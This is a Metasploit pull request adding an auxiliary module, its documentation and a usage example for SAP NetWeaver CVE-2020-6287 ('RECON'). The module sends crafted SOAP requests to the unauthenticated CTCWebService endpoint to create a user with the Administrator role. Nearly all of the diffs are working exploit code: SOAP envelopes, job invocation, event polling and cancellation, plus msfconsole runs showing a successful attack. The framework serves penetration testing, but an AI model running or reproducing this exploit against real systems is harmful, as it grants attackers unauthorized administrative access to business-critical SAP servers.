### PR TITLE
Module for SAP "RECON" CVE-2020-6287 that adds an admin user

### DIFF
--- a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md
+++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md
@@ -1,4 +1,5 @@
 ## Vulnerable Application
+
 This module leverages an unauthenticated web service to submit a job which will create a user with a specified role. The
 job involves running a wizard. After the necessary action is taken, the job is canceled to avoid unnecessary system
 changes.
@@ -7,7 +8,7 @@ SAP NetWeaver NetWeaver versions 7.30 through 7.50 are affected by this vulnerab
 Amazon Web Services (AWS) can be used as a testing environment. One such image is provided by Linke IT America LLC and
 is available on the [AWS Marketplace][1] with installation instructions posted to their [blog][2].
 
-Once setup and configured, the instances will be vulnerable on the default HTTP port 50000.
+Once set up and configured, the instances will be vulnerable on the default HTTP port 50000.
 
 If the password does not meet the requirements (e.g. the value is too short), the server will respond with an error
 message and the Metasploit module will need to be rerun.
@@ -24,6 +25,7 @@ message and the Metasploit module will need to be rerun.
 ## Options
 
 ### ROLE
+
 The role to assign to the user in the system. This value is "Administrator" by default. If the role does not exist, then
 execution will fail. For more information on users and roles, see the [SAP documentation][3].
 

--- a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md
+++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+This module leverages an unauthenticated web service to submit a job which will create a user with a specified role. The
+job involves running a wizard. After the necessary action is taken, the job is canceled to avoid unnecessary system
+changes.
+
+SAP NetWeaver NetWeaver versions 7.30 through 7.50 are affected by this vulnerability. An Amazon Machine Image (AMI) for
+Amazon Web Services (AWS) can be used as a testing environment. One such image is provided by Linke IT America LLC and
+is available on the [AWS Marketplace][1] with installation instructions posted to their [blog][2].
+
+Once setup and configured, the instances will be vulnerable on the default HTTP port 50000.
+
+If the password does not meet the requirements (e.g. the value is too short), the server will respond with an error
+message and the Metasploit module will need to be rerun.
+
+## Verification Steps
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use auxiliary/admin/sap/cve_2020_6287_ws_add_user`
+  1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+  1. Run the module and wait a few seconds
+  1. Once the "PCK Upgrade" job has been canceled, log in with the created credentials
+
+## Options
+
+### ROLE
+The role to assign to the user in the system. This value is "Administrator" by default. If the role does not exist, then
+execution will fail. For more information on users and roles, see the [SAP documentation][3].
+
+From the documentation:
+> Standard UME roles include such actions. The UME role Administrator includes Manage_ All, which enables you to display
+> and change everything. By default, administrator roles are only assigned to administrators.
+
+## Scenarios
+
+### SAP NetWeaver 7.50
+
+For example, adding a new user `metasploit` with the `Administrator` role:
+
+```
+msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan
+RHOSTS => netweaver.lan
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
+USERNAME => metasploit
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
+PASSWORD => 0pe3nS3sam3
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true
+VERBOSE => true
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
+[*] Running module against 192.168.53.183
+
+[*] Starting the PCK Upgrade job...
+[+] Job running with session id: 2c139ded-287f-4c21-a5ef-4c379abcbe22
+[*] Received event description: Execution of User Management
+[*] Received event description: Create User PCKUser
+[*] Received event description: Assign Role SAP_XI_PCK_CONFIG to PCKUser
+[*] Canceling the PCK Upgrade job...
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) >
+```
+
+[1]: https://aws.amazon.com/marketplace/seller-profile?id=56cbce49-5486-4a83-a6b7-0fea3841da1b
+[2]: https://docs.linkeit.com/amis/catalog/sap_ready_ami_installation_guide_nw750java_susesyb/
+[3]: https://help.sap.com/doc/saphelp_nw73ehp1/7.31.19/en-US/4a/6e8a7ab94e4d27e10000000a42189b/frameset.htm

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME', [ true, 'The username to create' ]),
         OptString.new('PASSWORD', [ true, 'The password for the new user' ]),
         OptString.new('ROLE', [ true, 'The role to assign the new user', 'Administrator' ]),
-        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/CTCWebService/CTCWebServiceBean' ])
+        OptString.new('TARGETURI', [ true, 'Path to CTCWebService', '/CTCWebService/CTCWebServiceBean' ])
       ]
     )
   end
@@ -127,29 +127,29 @@ class MetasploitModule < Msf::Auxiliary
             <roleName>#{datastore['ROLE'].encode(xml: :text)}</roleName>
           </SAP_XI_PCK_CONFIG>
           <SAP_XI_PCK_COMMUNICATION>
-            <roleName>Administrator</roleName>
+            <roleName>#{Rex::Text.rand_text_alphanumeric(10..16)}</roleName>
           </SAP_XI_PCK_COMMUNICATION>
           <SAP_XI_PCK_MONITOR>
-            <roleName>Administrator</roleName>
+            <roleName>#{Rex::Text.rand_text_alphanumeric(10..16)}</roleName>
           </SAP_XI_PCK_MONITOR>
           <SAP_XI_PCK_ADMIN>
-            <roleName>Administrator</roleName>
+            <roleName>#{Rex::Text.rand_text_alphanumeric(10..16)}</roleName>
           </SAP_XI_PCK_ADMIN>
           <PCKUser>
-            <userName>#{datastore['USERNAME'].encode(xml: :text)}</userName>
+            <userName secure="true">#{datastore['USERNAME'].encode(xml: :text)}</userName>
             <password secure="true">#{datastore['PASSWORD'].encode(xml: :text)}</password>
           </PCKUser>
           <PCKReceiver>
-            <userName>pckreceiver2</userName>
-            <password secure="true">Password1</password>
+            <userName>#{Rex::Text.rand_text_alphanumeric(10..16)}</userName>
+            <password secure="true">#{Rex::Text.rand_text_alphanumeric(10..16)}</password>
           </PCKReceiver>
           <PCKMonitor>
-            <userName>pckmonitor2</userName>
-            <password secure="true">Password1</password>
+            <userName>#{Rex::Text.rand_text_alphanumeric(10..16)}</userName>
+            <password secure="true">#{Rex::Text.rand_text_alphanumeric(10..16)}</password>
           </PCKMonitor>
           <PCKAdmin>
-            <userName>pckadmin2</userName>
-            <password secure="true">Password1</password>
+            <userName>#{Rex::Text.rand_text_alphanumeric(10..16)}</userName>
+            <password secure="true">#{Rex::Text.rand_text_alphanumeric(10..16)}</password>
           </PCKAdmin>
         </Usermanagement>
       </PCK>

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -23,7 +23,7 @@ class WebServiceSession
     res = send_request_soap(envelope)
     fail_with(Failure::UnexpectedReply, 'Failed to cancel execution') if res.nil?
 
-    return res.get_xml_document.xpath('//return/text()') != 'false'
+    return res.get_xml_document.xpath('//return/text()').to_s != 'false'
   end
 
   def get_event
@@ -57,7 +57,7 @@ class WebServiceSession
     res = send_request_soap(envelope)
     fail_with(Failure::UnexpectedReply, 'Failed to check if events are available') if res.nil?
 
-    return res.get_xml_document.xpath('//return/text()') != 'false'
+    return res.get_xml_document.xpath('//return/text()').to_s != 'false'
   end
 
   attr_reader :session_id
@@ -117,6 +117,17 @@ class MetasploitModule < Msf::Auxiliary
     print_status('Starting the PCK Upgrade job...')
     job = invoke_pckupgrade
     print_good("Job running with session id: #{job.session_id}")
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      name: self.name,
+      sname: ssl ? 'https' : 'http',
+      proto: 'tcp',
+      :refs => self.references,
+      info: "Module #{self.fullname} successfully submitted a job via the CTCWebService"
+    )
+
 
     loop do
       # it's a slow process, wait between status checks

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'SAP Unauthenticated WebService User Creation',
+      'Description'     => %q{
+      },
+      'Author'          => [
+        'Pablo Artuso',
+        'Dmitry Chastuhin',
+        'Spencer McIntyre'
+      ],
+      'License'         => MSF_LICENSE,
+      'References'      => [
+        [ 'CVE', '2020-6287' ],
+        [ 'URL', 'https://github.com/chipik/SAP_RECON' ],
+        [ 'URL', 'https://www.onapsis.com/recon-sap-cyber-security-vulnerability' ],
+      ],
+      'Notes' => {
+          'AKA' => [ 'RECON' ]
+      },
+      'DisclosureDate' => '2020-07-14'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('USERNAME',  [ true, 'The username to create' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the new user' ]),
+        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/CTCWebService/CTCWebServiceBean'])
+      ])
+  end
+
+  def run
+    uri = normalize_uri(target_uri.path, 'ConfigServlet')
+
+    res = send_request_cgi(
+      {
+        'uri' => uri,
+        'method' => 'POST',
+        'ctype' => 'text/xml;charset=UTF-8',
+        'data' => soap_create_user
+      })
+    unless res&.code == 200
+      print_error("#{rhost}:#{rport} - Exploit failed")
+    end
+  end
+
+  def soap_create_user
+    message_data =  '<root>'
+    message_data << '  <user>'
+    message_data << '    <JavaOrABAP>java</JavaOrABAP>'
+    message_data << "    <username>#{datastore['USERNAME'].encode(xml: :text)}</username>"
+    message_data << "    <password>#{datastore['PASSWORD'].encode(xml: :text)}</password>"
+    message_data << '    <userType></userType>'
+    message_data << '  </user>'
+    message_data << '</root>'
+    message = {
+      data: message_data,
+      name: 'userDetails'
+    }
+
+    envelope =  '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">'
+    envelope << '  <soapenv:Header/>'
+    envelope << '  <soapenv:Body>'
+    envelope << '    <urn:executeSynchronious>'
+    envelope << '        <identifier>'
+    envelope << '          <component>sap.com/tc~lm~config~content</component>'
+    envelope << '          <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>'
+    envelope << '       </identifier>'
+    envelope << '       <contextMessages>'
+    envelope << "          <baData>#{ Rex::Text.encode_base64(message[:data]) }</baData>"
+    envelope << "          <name>#{ message[:name] }</name>"
+    envelope << '       </contextMessages>'
+    envelope << '    </urn:executeSynchronious>'
+    envelope << '   </soapenv:Body>'
+    envelope << '</soapenv:Envelope>'
+  end
+end

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -3,6 +3,72 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+class WebServiceSession
+  def initialize(mod, session_id)
+    @mod = mod
+    @session_id = session_id
+  end
+
+  def cancel_execution
+    envelope = Nokogiri::XML(<<-EOS, nil, nil, options=Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+         <soapenv:Header/>
+         <soapenv:Body>
+            <urn:cancelExecution>
+               <sessionId>#{ @session_id.encode(xml: :text) }</sessionId>
+            </urn:cancelExecution>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    EOS
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to cancel execution') if res.nil?
+
+    return res.get_xml_document.xpath('//return/text()') != 'false'
+  end
+
+  def get_event
+    envelope = Nokogiri::XML(<<-EOS, nil, nil, options=Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+         <soapenv:Header/>
+         <soapenv:Body>
+            <urn:getNextEvent>
+               <sessionId>#{ @session_id.encode(xml: :text) }</sessionId>
+            </urn:getNextEvent>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    EOS
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the event information') if res.nil?
+
+    return Nokogiri::XML(Rex::Text.decode_base64(res.get_xml_document.xpath('//return/text()')))
+  end
+
+  def has_events_available?
+    envelope = Nokogiri::XML(<<-EOS, nil, nil, options=Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+         <soapenv:Header/>
+         <soapenv:Body>
+            <urn:eventsAvailable>
+               <sessionId>#{ @session_id.encode(xml: :text) }</sessionId>
+            </urn:eventsAvailable>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    EOS
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to check if events are available') if res.nil?
+
+    return res.get_xml_document.xpath('//return/text()') != 'false'
+  end
+
+  attr_reader :session_id
+
+  private
+
+  def send_request_soap(*args, **kwargs)
+    @mod.send_request_soap(*args, **kwargs)
+  end
+end
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
@@ -10,6 +76,9 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'            => 'SAP Unauthenticated WebService User Creation',
       'Description'     => %q{
+        This module leverages an unauthenticated web service to submit a job which will create a user with a specified
+        role. The job involves running a wizard however after the necessary action is taken the job is canceled to avoid
+        unnecessary system changes.
       },
       'Author'          => [
         'Pablo Artuso',
@@ -21,6 +90,7 @@ class MetasploitModule < Msf::Auxiliary
         [ 'CVE', '2020-6287' ],
         [ 'URL', 'https://github.com/chipik/SAP_RECON' ],
         [ 'URL', 'https://www.onapsis.com/recon-sap-cyber-security-vulnerability' ],
+        [ 'URL', 'https://us-cert.cisa.gov/ncas/alerts/aa20-195a' ]
       ],
       'Notes' => {
           'AKA' => [ 'RECON' ]
@@ -33,53 +103,131 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(50000),
         OptString.new('USERNAME',  [ true, 'The username to create' ]),
         OptString.new('PASSWORD', [ true, 'The password for the new user' ]),
+        OptString.new('ROLE', [ true, 'The role to assign the new user', 'Administrator']),
         OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/CTCWebService/CTCWebServiceBean'])
       ])
   end
 
   def run
-    uri = normalize_uri(target_uri.path, 'ConfigServlet')
+    job = nil
+    print_status('Starting the PCK Upgrade job...')
+    job = invoke_pckupgrade
+    print_good("Job running with session id: #{job.session_id}")
 
-    res = send_request_cgi(
-      {
-        'uri' => uri,
-        'method' => 'POST',
-        'ctype' => 'text/xml;charset=UTF-8',
-        'data' => soap_create_user
-      })
-    unless res&.code == 200
-      print_error("#{rhost}:#{rport} - Exploit failed")
+    while true
+      # it's a slow process, wait between status checks
+      sleep 2
+
+      if job.has_events_available?
+        event = job.get_event
+
+        unless (action_id = event.xpath('//ctc:StartAction/ctc:Action/ctc:ActionId/text()')).blank?
+          if action_id.to_s == 'genErrorNotification'
+            report_error_details(job)
+            fail_with(Failure::Unknown, 'General error')
+          end
+        end
+
+        unless (description = event.xpath('//ctc:StartAction/ctc:Action/ctc:Description/text()')).blank?
+          vprint_status("Received event description: #{description}")
+        end
+
+        unless (description = event.xpath('//ctc:FinishAction/ctc:Action/ctc:Description/text()')).blank?
+          break if description.to_s =~ /Assign Role SAP_XI_PCK_CONFIG to PCKUser/i
+        end
+      end
+    end
+
+  ensure
+    unless job.nil?
+      print_status('Canceling the PCK Upgrade job...')
+      job.cancel_execution
     end
   end
 
-  def soap_create_user
-    message_data =  '<root>'
-    message_data << '  <user>'
-    message_data << '    <JavaOrABAP>java</JavaOrABAP>'
-    message_data << "    <username>#{datastore['USERNAME'].encode(xml: :text)}</username>"
-    message_data << "    <password>#{datastore['PASSWORD'].encode(xml: :text)}</password>"
-    message_data << '    <userType></userType>'
-    message_data << '  </user>'
-    message_data << '</root>'
-    message = {
-      data: message_data,
-      name: 'userDetails'
-    }
+  def report_error_details(job)
+    print_error('Received a general error notification')
+    error_event = job.get_event
 
-    envelope =  '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">'
-    envelope << '  <soapenv:Header/>'
-    envelope << '  <soapenv:Body>'
-    envelope << '    <urn:executeSynchronious>'
-    envelope << '        <identifier>'
-    envelope << '          <component>sap.com/tc~lm~config~content</component>'
-    envelope << '          <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>'
-    envelope << '       </identifier>'
-    envelope << '       <contextMessages>'
-    envelope << "          <baData>#{ Rex::Text.encode_base64(message[:data]) }</baData>"
-    envelope << "          <name>#{ message[:name] }</name>"
-    envelope << '       </contextMessages>'
-    envelope << '    </urn:executeSynchronious>'
-    envelope << '   </soapenv:Body>'
-    envelope << '</soapenv:Envelope>'
+    print_error('Error details:')
+    error_event.xpath('//ctc:Notification/ctcNote:Messages/ctcNote:Message').each do |message|
+      print_error("  #{message.text}")
+    end
+  end
+
+  def send_request_soap(envelope)
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path),
+        'method' => 'POST',
+        'ctype' => 'text/xml;charset=UTF-8',
+        'data' => envelope
+      })
+
+    return nil unless res&.code == 200
+    return nil unless res.headers['Content-Type'].strip.start_with?('text/xml')
+    res
+  end
+
+  def invoke_pckupgrade
+    message = {name: 'Netweaver.PI_PCK.PCK'}
+    message[:data] = Nokogiri::XML(<<-EOS, nil, nil, options=Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <PCK>
+        <Usermanagement>
+          <SAP_XI_PCK_CONFIG>
+            <roleName>#{ datastore['ROLE'].encode(xml: :text) }</roleName>
+          </SAP_XI_PCK_CONFIG>
+          <SAP_XI_PCK_COMMUNICATION>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_COMMUNICATION>
+          <SAP_XI_PCK_MONITOR>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_MONITOR>
+          <SAP_XI_PCK_ADMIN>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_ADMIN>
+          <PCKUser>
+            <userName>#{ datastore['USERNAME'].encode(xml: :text) }</userName>
+            <password secure="true">#{ datastore['PASSWORD'].encode(xml: :text) }</password>
+          </PCKUser>
+          <PCKReceiver>
+            <userName>pckreceiver2</userName>
+            <password secure="true">Password1</password>
+          </PCKReceiver>
+          <PCKMonitor>
+            <userName>pckmonitor2</userName>
+            <password secure="true">Password1</password>
+          </PCKMonitor>
+          <PCKAdmin>
+            <userName>pckadmin2</userName>
+            <password secure="true">Password1</password>
+          </PCKAdmin>
+        </Usermanagement>
+      </PCK>
+    EOS
+
+    envelope = Nokogiri::XML(<<-EOS, nil, nil, options=Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+        <soapenv:Header/>
+        <soapenv:Body>
+          <urn:execute>
+              <identifier>
+                <component>sap.com/tc~lm~config~content</component>
+                <path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path>
+             </identifier>
+             <contextMessages>
+                <baData>#{ Rex::Text.encode_base64(message[:data]) }</baData>
+                <name>#{ message[:name] }</name>
+             </contextMessages>
+          </urn:execute>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    EOS
+
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to start the PCK Upgrade process') unless res&.code == 200
+
+    session_id = res.get_xml_document.xpath('//return/text()').to_s
+    WebServiceSession.new(self, session_id)
   end
 end

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -10,7 +10,7 @@ class WebServiceSession
   end
 
   def cancel_execution
-    envelope = Nokogiri::XML(<<-EOS, nil, nil, options = Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
          <soapenv:Header/>
          <soapenv:Body>
@@ -19,15 +19,15 @@ class WebServiceSession
             </urn:cancelExecution>
          </soapenv:Body>
       </soapenv:Envelope>
-    EOS
+    ENVELOPE
     res = send_request_soap(envelope)
     fail_with(Failure::UnexpectedReply, 'Failed to cancel execution') if res.nil?
 
-    return res.get_xml_document.xpath('//return/text()').to_s != 'false'
+    res.get_xml_document.xpath('//return/text()').to_s != 'false'
   end
 
-  def get_event
-    envelope = Nokogiri::XML(<<-EOS, nil, nil, options = Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+  def get_event # rubocop:disable Naming/AccessorMethodName
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
          <soapenv:Header/>
          <soapenv:Body>
@@ -36,15 +36,15 @@ class WebServiceSession
             </urn:getNextEvent>
          </soapenv:Body>
       </soapenv:Envelope>
-    EOS
+    ENVELOPE
     res = send_request_soap(envelope)
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve the event information') if res.nil?
 
-    return Nokogiri::XML(Rex::Text.decode_base64(res.get_xml_document.xpath('//return/text()')))
+    Nokogiri::XML(Rex::Text.decode_base64(res.get_xml_document.xpath('//return/text()')))
   end
 
-  def has_events_available?
-    envelope = Nokogiri::XML(<<-EOS, nil, nil, options = Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+  def has_events_available? # rubocop:disable Naming/PredicateName
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
          <soapenv:Header/>
          <soapenv:Body>
@@ -53,11 +53,11 @@ class WebServiceSession
             </urn:eventsAvailable>
          </soapenv:Body>
       </soapenv:Envelope>
-    EOS
+    ENVELOPE
     res = send_request_soap(envelope)
     fail_with(Failure::UnexpectedReply, 'Failed to check if events are available') if res.nil?
 
-    return res.get_xml_document.xpath('//return/text()').to_s != 'false'
+    res.get_xml_document.xpath('//return/text()').to_s != 'false'
   end
 
   attr_reader :session_id
@@ -79,13 +79,13 @@ class MetasploitModule < Msf::Auxiliary
         'Name' => 'SAP Unauthenticated WebService User Creation',
         'Description' => %q{
           This module leverages an unauthenticated web service to submit a job which will create a user with a specified
-          role. The job involves running a wizard however after the necessary action is taken the job is canceled to avoid
+          role. The job involves running a wizard. After the necessary action is taken, the job is canceled to avoid
           unnecessary system changes.
         },
         'Author' => [
-          'Pablo Artuso',
-          'Dmitry Chastuhin',
-          'Spencer McIntyre'
+          'Pablo Artuso', # The Onapsis Security Researcher who originally found the vulnerability
+          'Dmitry Chastuhin', # Author of one of the early PoCs utilizing CTCWebService
+          'Spencer McIntyre' # This metasploit module
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -121,13 +121,12 @@ class MetasploitModule < Msf::Auxiliary
     report_vuln(
       host: rhost,
       port: rport,
-      name: self.name,
+      name: name,
       sname: ssl ? 'https' : 'http',
       proto: 'tcp',
-      :refs => self.references,
-      info: "Module #{self.fullname} successfully submitted a job via the CTCWebService"
+      refs: references,
+      info: "Module #{fullname} successfully submitted a job via the CTCWebService"
     )
-
 
     loop do
       # it's a slow process, wait between status checks
@@ -187,7 +186,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def invoke_pckupgrade
     message = { name: 'Netweaver.PI_PCK.PCK' }
-    message[:data] = Nokogiri::XML(<<-EOS, nil, nil, options = Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+    message[:data] = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
       <PCK>
         <Usermanagement>
           <SAP_XI_PCK_CONFIG>
@@ -220,9 +219,9 @@ class MetasploitModule < Msf::Auxiliary
           </PCKAdmin>
         </Usermanagement>
       </PCK>
-    EOS
+    ENVELOPE
 
-    envelope = Nokogiri::XML(<<-EOS, nil, nil, options = Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
         <soapenv:Header/>
         <soapenv:Body>
@@ -238,7 +237,7 @@ class MetasploitModule < Msf::Auxiliary
           </urn:execute>
          </soapenv:Body>
       </soapenv:Envelope>
-    EOS
+    ENVELOPE
 
     res = send_request_soap(envelope)
     fail_with(Failure::UnexpectedReply, 'Failed to start the PCK Upgrade process') unless res&.code == 200

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
         'Author' => [
           'Pablo Artuso', # The Onapsis Security Researcher who originally found the vulnerability
           'Dmitry Chastuhin', # Author of one of the early PoCs utilizing CTCWebService
-          'Spencer McIntyre' # This metasploit module
+          'Spencer McIntyre' # This Metasploit module
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -40,8 +40,8 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(50000),
         OptString.new('USERNAME', [ true, 'The username to create' ]),
         OptString.new('PASSWORD', [ true, 'The password for the new user' ]),
-        OptString.new('ROLE', [ true, 'The role to assign the new user', 'Administrator']),
-        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/CTCWebService/CTCWebServiceBean'])
+        OptString.new('ROLE', [ true, 'The role to assign the new user', 'Administrator' ]),
+        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/CTCWebService/CTCWebServiceBean' ])
       ]
     )
   end


### PR DESCRIPTION
This is a PR that will add an admin user to vulnerable SAP Netweaver systems (7.30-7.50) by sending a crafted SOAP request to the unauthenticated endpoint `CTCWebService/CTCWebServiceBean`.

This can also add an ABAP user as well but it's not currently exposed through the module's data store options.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/sap/cve_2020_6287_ws_add_user`
- [x] Set the `RHOST`, `USERNAME`, and `PASSWORD` options
- [x] Run the module and login with your new account

## Example

```
msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan
RHOSTS => netweaver.lan
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
USERNAME => metasploit
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
PASSWORD => 0pe3nS3sam3
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
[*] Running module against 192.168.53.183
[*] Starting the PCK Upgrade job...
[+] Job running with session id: 2c139ded-287f-4c21-a5ef-4c379abcbe22
[*] Received event description: Execution of User Management
[*] Received event description: Create User PCKUser
[*] Received event description: Assign Role SAP_XI_PCK_CONFIG to PCKUser
[*] Canceling the PCK Upgrade job...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > 
```